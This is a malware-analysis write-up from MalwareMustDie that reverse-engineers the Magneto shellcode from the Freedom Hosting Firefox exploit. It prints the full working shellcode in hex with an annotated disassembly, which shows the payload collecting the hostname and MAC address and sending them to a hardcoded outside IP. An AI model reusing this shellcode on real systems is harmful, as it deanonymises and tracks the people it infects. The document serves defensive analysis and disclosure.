# MalwareMustDie !

# Cracking Magneto ( FBI Freedom Hosting Payload malware )

# by @ unixfreaxjp using r2 ( r2 rocks ! )

# decode the function f ( var15 , view , var16 ) in malware infector Javascript code in http : //pastebin.com/RTwsyrH8

# grabbed from evil IFRAMER Javascript in http : //pastebin.com/bu2Ya0n6

# ( above URL achieved by hard work of MMD DE )

# Analysis method ::

# Extract the value check the hex w / parse into script in

# https : //www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

# correct result of the bins :

[ 0x00000226 ] > ! vt check . / magneto. payload . shellcode

-----------------------------------------------------------

VT - shell 1.1 FreeBSD version - by @ unixfreaxjp

-----------------------------------------------------------

Sample : . / magneto. payload . shellcode

MD5 : 7655cb3af1869988edf698e0ea665c27

SHA256 : 74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0

URL : https : //www.virustotal.com/latest-scan/74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0

-----------------------------------------------------------

// Bins info:

file magneto. payload . shellcode

fd 10

size 0x3bc

mode r --

block 0x7d0

// hex raw:

60FCE88A0000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31C0AC3C617C022C20C1CF0D01C7E2F

052578B52108B423C01D08B407885C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C7

38E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE0585F5

A8B12EB86055D81BDE90200004745542075708D85D102000050684C772607FFD585C0745E8D85D802000050684C77

2607FFD585C0744CBB9001000029DC54536829806B00FFD501DC85C07536505050504050405068EA0FDFE0FFD531D

BF7D339C3741F89C36A108DB5E102000056536899A57461FFD585C0741FFE8D8900000075E380BD4F020000017407

E83B010000EB05E84D010000FFE7B80001000029C489E252505268B649DE01FFD55F81C40001000085C00F85F2000

00057E8F90000005E89CA8DBDE9020000E8EB0000004F83FA207C05BA2000000089D156F3A4B90D0000008DB5C402

0000F3A489BD4B0200005E5668A9283480FFD585C00F84AA000000668B480A6683F9040F829C0000008D400C8B008

B088B09B8000100005089E729C489E657565151684872D2B8FFD585C081C4040100000FB70F83F906726CB9060000

00B81000000029C489E789CAD1E2505231D28A1688D024F0C0E8043C0977040430EB02043788074788D0240F3C097

7040430EB02043788074746E2D45929CF89FE5801C48BBD4B020000F3A4C6854F02000001E82E00000031C0505129

CF4F575368C2EB385FFFD55368756E4D61FFD5E9C8FEFFFF31C9F7D131C0F2AEF7D149C300000000008DBDE902000

0E8E4FFFFFF4FB94F0000008DB575020000F3A48DBDE9020000E8CBFFFFFFC30D0A436F6E6E656374696F6E3A206B

6565702D616C6976650D0A4163636570743A202A2F2A0D0A4163636570742D456E636F64696E673A20677A69700D0

A0D0A0083C70E31C9F7D131C0F3AE4FFFE70D0A436F6F6B69653A2049443D7773325F3332004950484C5041504900

0200005041DECA36474554202F30356365613464652D393531642D343033372D626638662D6636393035356232373

9626220485454502F312E310D0A486F73743A20000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000090

# I save it :

- rwxr -- r -- mmd mmd 956 Aug 13 05 : 01 magneto. payload . shellcode *

# view it with the hexbins and you will get some idea :

0000 60 FC E8 8A 00 00 00 60 89 E5 31 D2 64 8B 52 30 `......`.. 1 . d . R0

0010 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 . R .. R .. r ( .. J & 1.1

0020 C0 AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52 .. < a | . , ....... R

0030 57 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A W. R .. B < ... @ x.. tJ

0040 01 D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34 .. P . H .. X ... < I.4

0050 8B 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75 ...1.1....... 8 . u

0060 F4 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66 .. } . ; } $u. X . X $.. f

0070 8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24 .. K . X ......... D $

0080 24 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86 $ [ [ aYZQ.. X_Z ....

0090 05 5D 81 BD E9 02 00 00 47 45 54 20 75 70 8D 85 . ] ...... GET up.. <=== "GET"

00A0 D1 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 74 5E .... PhLw & ..... t ^

00B0 8D 85 D8 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 ...... PhLw & .....

00C0 74 4C BB 90 01 00 00 29 DC 54 53 68 29 80 6B 00 tL..... ) . TSh ) . k .

00D0 FF D5 01 DC 85 C0 75 36 50 50 50 50 40 50 40 50 ...... u6PPPP @ P @ P

00E0 68 EA 0F DF E0 FF D5 31 DB F7 D3 39 C3 74 1F 89 h...... 1 ... 9 . t ..

00F0 C3 6A 10 8D B5 E1 02 00 00 56 53 68 99 A5 74 61 . j ....... VSh .. ta

0100 FF D5 85 C0 74 1F FE 8D 89 00 00 00 75 E3 80 BD .... t ....... u ...

0110 4F 02 00 00 01 74 07 E8 3B 01 00 00 EB 05 E8 4D O.... t .. ; ...... M

0120 01 00 00 FF E7 B8 00 01 00 00 29 C4 89 E2 52 50 .......... ) ... RP

0130 52 68 B6 49 DE 01 FF D5 5F 81 C4 00 01 00 00 85 Rh. I ...._.......

0140 C0 0F 85 F2 00 00 00 57 E8 F9 00 00 00 5E 89 CA ....... W ..... ^ ..

0150 8D BD E9 02 00 00 E8 EB 00 00 00 4F 83 FA 20 7C ........... O .. |

0160 05 BA 20 00 00 00 89 D1 56 F3 A4 B9 0D 00 00 00 .. ..... V .......

0170 8D B5 C4 02 00 00 F3 A4 89 BD 4B 02 00 00 5E 56 .......... K ... ^ V

0180 68 A9 28 34 80 FF D5 85 C0 0F 84 AA 00 00 00 66 h. ( 4 ........... f

0190 8B 48 0A 66 83 F9 04 0F 82 9C 00 00 00 8D 40 0C . H . f .......... @ .

01A0 8B 00 8B 08 8B 09 B8 00 01 00 00 50 89 E7 29 C4 ........... P .. ) .

01B0 89 E6 57 56 51 51 68 48 72 D2 B8 FF D5 85 C0 81 .. WVQQhHr .......

01C0 C4 04 01 00 00 0F B7 0F 83 F9 06 72 6C B9 06 00 ........... rl ...

01D0 00 00 B8 10 00 00 00 29 C4 89 E7 89 CA D1 E2 50 ....... ) ....... P

01E0 52 31 D2 8A 16 88 D0 24 F0 C0 E8 04 3C 09 77 04 R1.....$.... < . w .

01F0 04 30 EB 02 04 37 88 07 47 88 D0 24 0F 3C 09 77 .0... 7 .. G ..$. < . w

0200 04 04 30 EB 02 04 37 88 07 47 46 E2 D4 59 29 CF .. 0 ... 7 .. GF .. Y ) .

0210 89 FE 58 01 C4 8B BD 4B 02 00 00 F3 A4 C6 85 4F .. X .... K ....... O

0220 02 00 00 01 E8 2E 00 00 00 31 C0 50 51 29 CF 4F ......... 1 . PQ ) . O

0230 57 53 68 C2 EB 38 5F FF D5 53 68 75 6E 4D 61 FF WSh.. 8 _.. ShunMa .

0240 D5 E9 C8 FE FF FF 31 C9 F7 D1 31 C0 F2 AE F7 D1 ...... 1 ... 1 .....

0250 49 C3 00 00 00 00 00 8D BD E9 02 00 00 E8 E4 FF I...............

0260 FF FF 4F B9 4F 00 00 00 8D B5 75 02 00 00 F3 A4 .. O . O ..... u .....

0270 8D BD E9 02 00 00 E8 CB FF FF FF C3 0D 0A 43 6F .............. Co <=== "HTTP headers"

0280 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 nnection : keep - a

0290 6C 69 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F live.. Accept : */

02A0 2A 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 * .. Accept - Encodi

02B0 6E 67 3A 20 67 7A 69 70 0D 0A 0D 0A 00 83 C7 0E ng : gzip........

02C0 31 C9 F7 D1 31 C0 F3 AE 4F FF E7 0D 0A 43 6F 6F 1 ... 1 ... O .... Coo <=== "Cookie...."

02D0 6B 69 65 3A 20 49 44 3D 77 73 32 5F 33 32 00 49 kie : ID = ws2_32. I

02E0 50 48 4C 50 41 50 49 00 02 00 00 50 41 DE CA 36 PHLPAPI.... PA .. 6 <=== "IPHLPAPI.DLL trace...to what call??"

02F0 47 45 54 20 2F 30 35 63 65 61 34 64 65 2D 39 35 GET / 05cea4de - 95 <=== "Path URL & HTTP/1.1 used.."

0300 31 64 2D 34 30 33 37 2D 62 66 38 66 2D 66 36 39 1d - 4037 - bf8f - f69

0310 30 35 35 62 32 37 39 62 62 20 48 54 54 50 2F 31 055b279bb HTTP / 1

0320 2E 31 0D 0A 48 6F 73 74 3A 20 00 00 00 00 00 00 .1.. Host : ...... <=== "to bin encoded Host..."

0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

03B0 00 00 00 00 00 00 00 00 00 00 00 90 ............

# I am using radare to break the opcodes.. and manually trailed the flow & translating WinAPI calls.

# below is the positive result , there are some mistery left , like data after http request string , is excluded.

[ 0x00000000 ] > b 2000

[ 0x00000000 ] > pd

Do you want to print 199415 chars ? ( y / N )

0x00000000 60 pushad

0x00000001 fc cld

0x00000002 e88a000000 call 0x91

0x00000091 ( unk )

0x00000007 60 pushad

0x00000008 89e5 mov ebp , esp

0x0000000a 31d2 xor edx , edx

0x0000000c 648b5230 mov edx , [ fs : edx + 0x30 ]

0x00000010 8b520c mov edx , [ edx + 0xc ]

0x00000013 8b5214 mov edx , [ edx + 0x14 ]

. ------> 0x00000016 8b7228 mov esi , [ edx + 0x28 ]

| 0x00000019 0fb74a26 movzx ecx , word [ edx + 0x26 ]

| 0x0000001d 31ff xor edi , edi

| . --> 0x0000001f 31c0 xor eax , eax

| | 0x00000021 ac lodsb

| | 0x00000022 3c61 cmp al , 0x61

| |,=< 0x00000024 7c02 jl 0x28

| || 0x00000026 2c20 sub al , 0x20

| | ` -> 0x00000028 c1cf0d ror edi , 0xd

| | 0x0000002b 01c7 add edi , eax

| ` ==< 0x0000002d e2f0 loop 0x10000001f

| 0x0000002f 52 push edx

| 0x00000030 57 push edi

| 0x00000031 8b5210 mov edx , [ edx + 0x10 ]

| 0x00000034 8b423c mov eax , [ edx + 0x3c ]

| 0x00000037 01d0 add eax , edx

| 0x00000039 8b4078 mov eax , [ eax + 0x78 ]

| 0x0000003c 85c0 test eax , eax

| ,===< 0x0000003e 744a jz 0x8a

| | 0x00000040 01d0 add eax , edx

| | 0x00000042 50 push eax

| | 0x00000043 8b4818 mov ecx , [ eax + 0x18 ]

| | 0x00000046 8b5820 mov ebx , [ eax + 0x20 ]

| | 0x00000049 01d3 add ebx , edx

| . -----> 0x0000004b e33c jecxz 0x89

|| | 0x0000004d 49 dec ecx

|| | 0x0000004e 8b348b mov esi , [ ebx + ecx * 4 ]

|| | 0x00000051 01d6 add esi , edx

|| | 0x00000053 31ff xor edi , edi

|| . ----> 0x00000055 31c0 xor eax , eax

|||| 0x00000057 ac lodsb

|||| 0x00000058 c1cf0d ror edi , 0xd

|||| 0x0000005b 01c7 add edi , eax

|||| 0x0000005d 38e0 cmp al , ah

|| ` ====< 0x0000005f 75f4 jnz 0x100000055

|| | 0x00000061 037df8 add edi , [ ebp - 0x8 ]

|| | 0x00000064 3b7d24 cmp edi , [ ebp + 0x24 ]

| ` =====< 0x00000067 75e2 jnz 0x10000004b

| | 0x00000069 58 pop eax

| | 0x0000006a 8b5824 mov ebx , [ eax + 0x24 ]

| | 0x0000006d 01d3 add ebx , edx

| | 0x0000006f 668b0c4b mov cx , [ ebx + ecx * 2 ]

| | 0x00000073 8b581c mov ebx , [ eax + 0x1c ]

| | 0x00000076 01d3 add ebx , edx

| | 0x00000078 8b048b mov eax , [ ebx + ecx * 4 ]

| | 0x0000007b 01d0 add eax , edx

| | 0x0000007d 89442424 mov [ esp + 0x24 ] , eax

| | 0x00000081 5b pop ebx

| | 0x00000082 5b pop ebx

| | 0x00000083 61 popad

| | 0x00000084 59 pop ecx

| | 0x00000085 5a pop edx

| | 0x00000086 51 push ecx

| | 0x00000087 ffe0 jmp eax

| | 0x00000089 58 pop eax

| ` ---> 0x0000008a 5f pop edi

| 0x0000008b 5a pop edx

| 0x0000008c 8b12 mov edx , [ edx ]

` ======< 0x0000008e eb86 jmp 0x100000016

0x00000090 055d81bde9 add eax , 0xe9bd815d

0x00000095 0200 add al , [ eax ]

0x00000097 004745 add [ edi + 0x45 ] , al

0x0000009a 54 push esp

0x0000009b 207570 and [ ebp + 0x70 ] , dh

0x0000009e 8d85d1020000 lea eax , [ ebp + 0x2d1 ] ; ASCII "ws2_32"

0x000000a4 50 push eax

0x000000a5 684c772607 push 0x726774c ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"

0x000000aa ffd5 call ebp

0x00000000 ( unk , unk , unk , unk , unk , unk , unk , unk )

0x000000ac 85c0 test eax , eax

,=======< 0x000000ae 745e jz 0x10e

| 0x000000b0 8d85d8020000 lea eax , [ ebp + 0x2d8 ] ; ASCII "IPHLPAPI"

| 0x000000b6 50 push eax

| 0x000000b7 684c772607 push 0x726774c ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"

| 0x000000bc ffd5 call ebp

| 0x00000000 ( unk , unk )

| 0x000000be 85c0 test eax , eax

========< 0x000000c0 744c jz 0x10e

| 0x000000c2 bb90010000 mov ebx , 0x190

| 0x000000c7 29dc sub esp , ebx

| 0x000000c9 54 push esp

| 0x000000ca 53 push ebx

| 0x000000cb 6829806b00 push 0x6b8029 ; 0x006b8029 ; "WSAStartupA@WS2_32.DLL"

| 0x000000d0 ffd5 call ebp

| 0x00000000 ( unk , unk , unk )

| 0x000000d2 01dc add esp , ebx

| 0x000000d4 85c0 test eax , eax

========< 0x000000d6 7536 jnz 0x10e

| 0x000000d8 50 push eax

| 0x000000d9 50 push eax

| 0x000000da 50 push eax

| 0x000000db 50 push eax

| 0x000000dc 40 inc eax

| 0x000000dd 50 push eax

| 0x000000de 40 inc eax

| 0x000000df 50 push eax

| 0x000000e0 68ea0fdfe0 push 0xe0df0fea ; 0xe0df0fea ; "WSASocketA@WS2_32.DLL (Import, Hidden, 6 Params)"

| 0x000000e5 ffd5 call ebp

| 0x00000000 ( unk , unk , unk , unk , unk , unk , unk )

| 0x000000e7 31db xor ebx , ebx

| 0x000000e9 f7d3 not ebx

| 0x000000eb 39c3 cmp ebx , eax

========< 0x000000ed 741f jz 0x10e

| 0x000000ef 89c3 mov ebx , eax

--------> 0x000000f1 6a10 push 0x10 ; 0x00000010 ; the length , why it has to be this specific ??

| 0x000000f3 8db5e1020000 lea esi , [ ebp + 0x2e1 ] ; struct sockaddr_in { AF_INET , "80" , "65.222.202.54" }

^^^^^^^^^^^^^^^^^^ 2nd Callback is here !

| 0x000000f9 56 push esi ; sockaddr

| 0x000000fa 53 push ebx ; socket

| 0x000000fb 6899a57461 push 0x6174a599 ; 0x6174a599 ; "connect@WS2_32.DLL (Import, Hidden, 3 Params)"

| 0x00000100 ffd5 call ebp

| 0x00000000 ( unk , unk , unk , unk )

| 0x00000102 85c0 test eax , eax ; executed all of the opening connection part , to that IP , boom !!

========< 0x00000104 741f jz 0x125

| 0x00000106 fe8d89000000 dec byte [ ebp + 0x89 ] ; 5

========< 0x0000010c 75e3 jnz 0x1000000f1

` -------> 0x0000010e 80bd4f02000. cmp byte [ ebp + 0x24f ] , 0x1

========< 0x00000115 7407 jz 0x11e

0x00000117 e83b010000 call 0x257

0x00000257 ( )

========< 0x0000011c eb05 jmp 0x123

--------> 0x0000011e e84d010000 call 0x270

--------> 0x00000270 ( )

--------> 0x00000123 ffe7 jmp edi

--------> 0x00000125 b800010000 mov eax , 0x100

0x0000012a 29c4 sub esp , eax

0x0000012c 89e2 mov edx , esp

0x0000012e 52 push edx

0x0000012f 50 push eax

0x00000130 52 push edx ; below is where the hostname is grabbed↓

0x00000131 68b649de01 push 0x1de49b6 ; 0x01de49b6 ; "gethostname@WS2_32.DLL (Import, Hidden, 2 Params)"

0x00000136 ffd5 call ebp

0x00000000 ( unk , unk , unk , unk )

0x00000138 5f pop edi

0x00000139 81c400010000 add esp , 0x100

0x0000013f 85c0 test eax , eax ; poc of execution for above codes.

========< 0x00000141 0f85f2000000 jnz 0x239

0x00000147 57 push edi

0x00000148 e8f9000000 call 0x246 ; strlen ( gethostname ) ;

0x00000246 ( unk )

0x0000014d 5e pop esi

0x0000014e 89ca mov edx , ecx

0x00000150 8dbde9020000 lea edi , [ ebp + 0x2e9 ]

0x00000156 e8eb000000 call 0x246 ; // shift to last of HTTP request string..question is why?--(3)

0x00000246 ( )

0x0000015b 4f dec edi

0x0000015c 83fa20 cmp edx , 0x20

========< 0x0000015f 7c05 jl 0x166

0x00000161 ba20000000 mov edx , 0x20

--------> 0x00000166 89d1 mov ecx , edx

0x00000168 56 push esi

0x00000169 f3a4 rep movsb

0x0000016b b90d000000 mov ecx , 0xd ; below is how the cookie data will be checked ( compared )

0x00000170 8db5c4020000 lea esi , [ ebp + 0x2c4 ] ; " \r

Cookie: ID="

0x00000176 f3a4 rep movsb

0x00000178 89bd4b020000 mov [ ebp + 0x24b ] , edi

0x0000017e 5e pop esi

0x0000017f 56 push esi ; below is the check of host

0x00000180 68a9283480 push 0x803428a9 ; 0x803428a9 ; "gethostbyname@WS2_32.DLL (Import, Hidden, 1 Params)"

0x00000185 ffd5 call ebp

0x00000000 ( unk , unk , unk )

0x00000187 85c0 test eax , eax ; PoC of the execution of above codes.

========< 0x00000189 0f84aa000000 jz 0x239

0x0000018f 668b480a mov cx , [ eax + 0xa ]

0x00000193 6683f904 cmp cx , 0x4

========< 0x00000197 0f829c000000 jb 0x239

0x0000019d 8d400c lea eax , [ eax + 0xc ]

0x000001a0 8b00 mov eax , [ eax ]

0x000001a2 8b08 mov ecx , [ eax ]

0x000001a4 8b09 mov ecx , [ ecx ]

0x000001a6 b800010000 mov eax , 0x100

0x000001ab 50 push eax

0x000001ac 89e7 mov edi , esp

0x000001ae 29c4 sub esp , eax

0x000001b0 89e6 mov esi , esp

0x000001b2 57 push edi

0x000001b3 56 push esi

0x000001b4 51 push ecx

0x000001b5 51 push ecx ; this ↓ is ARP sending function w / sending TCP / IP

0x000001b6 684872d2b8 push 0xb8d27248 ; 0xb8d27248 ; "SendARP@IPHLPAPI.DLL" <== now we know where MAcADDR from

0x000001bb ffd5 call ebp

0x00000000 ( unk , unk , unk , unk , unk , unk )

0x000001bd 85c0 test eax , eax ; this code is a poc of an execution , boom !!

0x000001bf 81c404010000 add esp , 0x104

0x000001c5 0fb70f movzx ecx , word [ edi ]

0x000001c8 83f906 cmp ecx , 0x6

========< 0x000001cb 726c jb 0x239

0x000001cd b906000000 mov ecx , 0x6

0x000001d2 b810000000 mov eax , 0x10

0x000001d7 29c4 sub esp , eax

0x000001d9 89e7 mov edi , esp

0x000001db 89ca mov edx , ecx

0x000001dd d1e2 shl edx , 1

0x000001df 50 push eax

0x000001e0 52 push edx

--------> 0x000001e1 31d2 xor edx , edx

0x000001e3 8a16 mov dl , [ esi ]

0x000001e5 88d0 mov al , dl

0x000001e7 24f0 and al , 0xf0

0x000001e9 c0e804 shr al , 0x4

0x000001ec 3c09 cmp al , 0x9

========< 0x000001ee 7704 ja 0x1f4

0x000001f0 0430 add al , 0x30

========< 0x000001f2 eb02 jmp 0x1f6

--------> 0x000001f4 0437 add al , 0x37

--------> 0x000001f6 8807 mov [ edi ] , al

0x000001f8 47 inc edi

0x000001f9 88d0 mov al , dl

0x000001fb 240f and al , 0xf

0x000001fd 3c09 cmp al , 0x9

========< 0x000001ff 7704 ja 0x205

0x00000201 0430 add al , 0x30

========< 0x00000203 eb02 jmp 0x207

--------> 0x00000205 0437 add al , 0x37

--------> 0x00000207 8807 mov [ edi ] , al

0x00000209 47 inc edi

0x0000020a 46 inc esi

========< 0x0000020b e2d4 loop 0x1000001e1

0x0000020d 59 pop ecx

0x0000020e 29cf sub edi , ecx

0x00000210 89fe mov esi , edi

0x00000212 58 pop eax

0x00000213 01c4 add esp , eax

0x00000215 8bbd4b020000 mov edi , [ ebp + 0x24b ]

0x0000021b f3a4 rep movsb

0x0000021d c6854f02000. mov byte [ ebp + 0x24f ] , 0x1

0x00000224 e82e000000 call 0x257 ; get "Connection: keep-alive \r

Accept: */* \r

Accept-Encoding: gzip \r

\r

"

0x00000257 ( unk , unk )

0x00000229 31c0 xor eax , eax

0x0000022b 50 push eax

0x0000022c 51 push ecx

0x0000022d 29cf sub edi , ecx

0x0000022f 4f dec edi

0x00000230 57 push edi

0x00000231 53 push ebx

0x00000232 68c2eb385f push 0x5f38ebc2 ; 0x5f38ebc2 ; "send@WS2_32.DLL (Import, Hidden, 4 Params)"

0x00000237 ffd5 call ebp

0x00000000 ( unk , unk , unk , unk , unk )

--------> 0x00000239 53 push ebx

0x0000023a 68756e4d61 push 0x614d6e75 ; 0x614d6e75 ; "closesocket@WS2_32.DLL (Import, Hidden, 1 Params)"

0x0000023f ffd5 call ebp

0x00000000 ( unk , unk )

========< 0x00000241 e9c8feffff jmp 0x10000010e

0x00000246 31c9 xor ecx , ecx

0x00000248 f7d1 not ecx

0x0000024a 31c0 xor eax , eax

0x0000024c f2ae repne scasb

0x0000024e f7d1 not ecx

0x00000250 49 dec ecx

0x00000251 c3 ret

0x00000252 0000 add [ eax ] , al

0x00000254 0000 add [ eax ] , al

0x00000256 008dbde90200 add [ ebp + 0x2e9bd ] , cl

0x0000025c 00e8 add al , ch

0x0000025e e4ff in al , 0xff

0x00000260 ff invalid

0x00000261 ff4fb9 dec dword [ edi - 0x47 ]

0x00000264 4f dec edi

0x00000265 0000 add [ eax ] , al

0x00000267 008db5750200 add [ ebp + 0x275b5 ] , cl

0x0000026d 00f3 add bl , dh

0x0000026f a4 movsb

0x00000270 8dbde9020000 lea edi , [ ebp + 0x2e9 ]

0x00000276 e8cbffffff call 0x100000246

0x00000246 ( )

0x0000027b c3 ret

0x0000027c 0d0a436f6e or eax , 0x6e6f430a

0x00000281 6e outsb

0x00000282 656374696f arpl [ gs : ecx + ebp * 2 + 0x6f ] , si

0x00000287 6e outsb

0x00000288 3a20 cmp ah , [ eax ]

0x0000028a 6b656570 imul esp , [ ebp + 0x65 ] , 0x70

0x0000028e 2d616c6976 sub eax , 0x76696c61

0x00000293 650d0a416363 or eax , 0x6363410a

,=< 0x00000299 657074 jo 0x310

| 0x0000029c 3a20 cmp ah , [ eax ]

| 0x0000029e 2a2f sub ch , [ edi ]

| 0x000002a0 2a0d0a416363 sub cl , [ 0x6363410a ]

,==< 0x000002a6 657074 jo 0x31d

|| 0x000002a9 2d456e636f sub eax , 0x6f636e45

|| 0x000002ae 64696e673a2. imul ebp , [ fs : esi + 0x67 ] , 0x7a67203a

|| 0x000002b6 69700d0a0d0. imul esi , [ eax + 0xd ] , 0xa0d0a

|| 0x000002bd 83c70e add edi , 0xe

|| 0x000002c0 31c9 xor ecx , ecx

|| 0x000002c2 f7d1 not ecx

|| 0x000002c4 31c0 xor eax , eax

|| 0x000002c6 f3ae repe scasb

|| 0x000002c8 4f dec edi

|| 0x000002c9 ffe7 jmp edi

|| 0x000002cb 0d0a436f6f or eax , 0x6f6f430a

|| 0x000002d0 6b69653a imul ebp , [ ecx + 0x65 ] , 0x3a

|| 0x000002d4 204944 and [ ecx + 0x44 ] , cl

|| 0x000002d7 3d7773325f cmp eax , 0x5f327377

|| 0x000002dc 3332 xor esi , [ edx ]

|| 0x000002de 004950 add [ ecx + 0x50 ] , cl

|| 0x000002e1 48 dec eax

|| 0x000002e2 4c dec esp

|| 0x000002e3 50 push eax

|| 0x000002e4 41 inc ecx

|| 0x000002e5 50 push eax

|| 0x000002e6 49 dec ecx

|| 0x000002e7 0002 add [ edx ] , al

|| 0x000002e9 0000 add [ eax ] , al

|| 0x000002eb 50 push eax

|| 0x000002ec 41 inc ecx

|| 0x000002ed deca fmulp st2 , st0

|| 0x000002ef 3647 inc edi

|| 0x000002f1 45 inc ebp

|| 0x000002f2 54 push esp

|| 0x000002f3 202f and [ edi ] , ch

|| 0x000002f5 303563656134 xor [ 0x34616563 ] , dh

|| 0x000002fb 64652d39353. sub eax , 0x64313539

|| 0x00000302 2d34303337 sub eax , 0x37333034

|| 0x00000307 2d62663866 sub eax , 0x66386662

|| 0x0000030c 2d66363930 sub eax , 0x30393666

| 0x00000311 3535623237 xor eax , 0x37326235

| 0x00000316 396262 cmp [ edx + 0x62 ] , esp

| 0x00000319 204854 and [ eax + 0x54 ] , cl

| 0x0000031c 54 push esp

` --> 0x0000031d 50 push eax

0x0000031e 2f das

0x0000031f 312e xor [ esi ] , ebp

0x00000321 310d0a486f73 xor [ 0x736f480a ] , ecx

,===< 0x00000327 743a jz 0x363

| 0x00000329 2000 and [ eax ] , al

| 0x0000032b 0000 add [ eax ] , al

| 0x0000032d 0000 add [ eax ] , al

| 0x0000032f 0000 add [ eax ] , al

| 0x00000331 0000 add [ eax ] , al

| 0x00000333 0000 add [ eax ] , al

| 0x00000335 0000 add [ eax ] , al

| 0x00000337 0000 add [ eax ] , al

| 0x00000339 0000 add [ eax ] , al

| 0x0000033b 0000 add [ eax ] , al

| 0x0000033d 0000 add [ eax ] , al

| 0x0000033f 0000 add [ eax ] , al

| 0x00000341 0000 add [ eax ] , al

| 0x00000343 0000 add [ eax ] , al

| 0x00000345 0000 add [ eax ] , al

| 0x00000347 0000 add [ eax ] , al

| 0x00000349 0000 add [ eax ] , al

| 0x0000034b 0000 add [ eax ] , al

| 0x0000034d 0000 add [ eax ] , al

| 0x0000034f 0000 add [ eax ] , al

| 0x00000351 0000 add [ eax ] , al

| 0x00000353 0000 add [ eax ] , al

| 0x00000355 0000 add [ eax ] , al

| 0x00000357 0000 add [ eax ] , al

| 0x00000359 0000 add [ eax ] , al

| 0x0000035b 0000 add [ eax ] , al

| 0x0000035d 0000 add [ eax ] , al

| 0x0000035f 0000 add [ eax ] , al

| 0x00000361 0000 add [ eax ] , al

` ---> 0x00000363 0000 add [ eax ] , al

0x00000365 0000 add [ eax ] , al

0x00000367 0000 add [ eax ] , al

0x00000369 0000 add [ eax ] , al

0x0000036b 0000 add [ eax ] , al

0x0000036d 0000 add [ eax ] , al

0x0000036f 0000 add [ eax ] , al

0x00000371 0000 add [ eax ] , al

0x00000373 0000 add [ eax ] , al

0x00000375 0000 add [ eax ] , al

0x00000377 0000 add [ eax ] , al

0x00000379 0000 add [ eax ] , al

0x0000037b 0000 add [ eax ] , al

0x0000037d 0000 add [ eax ] , al

0x0000037f 0000 add [ eax ] , al

0x00000381 0000 add [ eax ] , al

0x00000383 0000 add [ eax ] , al

0x00000385 0000 add [ eax ] , al

0x00000387 0000 add [ eax ] , al

0x00000389 0000 add [ eax ] , al

0x0000038b 0000 add [ eax ] , al

0x0000038d 0000 add [ eax ] , al

0x0000038f 0000 add [ eax ] , al

0x00000391 0000 add [ eax ] , al

0x00000393 0000 add [ eax ] , al

0x00000395 0000 add [ eax ] , al

0x00000397 0000 add [ eax ] , al

0x00000399 0000 add [ eax ] , al

0x0000039b 0000 add [ eax ] , al

0x0000039d 0000 add [ eax ] , al

0x0000039f 0000 add [ eax ] , al

0x000003a1 0000 add [ eax ] , al

0x000003a3 0000 add [ eax ] , al

0x000003a5 0000 add [ eax ] , al

0x000003a7 0000 add [ eax ] , al

0x000003a9 0000 add [ eax ] , al

0x000003ab 0000 add [ eax ] , al

0x000003ad 0000 add [ eax ] , al

0x000003af 0000 add [ eax ] , al

0x000003b1 0000 add [ eax ] , al

0x000003b3 0000 add [ eax ] , al

0x000003b5 0000 add [ eax ] , al

0x000003b7 0000 add [ eax ] , al

0x000003b9 0000 add [ eax ] , al

0x000003bb 90 nop

# Explanation & conclusion for payload

The exploit is aiming Firefox , this shellcode is aiming Windows OS only ,

and affected to all victims accessing specific . onion sites where the redirection script was implemented.

So the payload is a shellcode. It send callback w / strings ( data ) for hostname to a specific IP outside of TOR.

During the connection session sending ARP to specific host args which will attached the PC 's MAC Address to the packet sent to the destination, the PCAP is the PoC for this.

While the GET request will send the global IP of the infected PC to the remote host. The PC' s hostname was grabbed before the send operation was done.

# Callback :

The IP address GeoIP :

65.222.202.54

ASN : 701 / UUNET

Prefix : 65.192.0.0 / 11

Vienna , Virginia , United States , North America

38.9012 ,- 77.2653 Verizon Business

Noted : One of unlisted ( N / A ) block of eight IP addresses in USA that have no organization listed

# Dumping the shellcode into the exe....

# binhex :

0000 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 MZ..............

0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0030 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 ............ @ ...

0040 50 45 00 00 4C 01 01 00 5D BE 45 45 00 00 00 00 PE.. L ... ] . EE ....

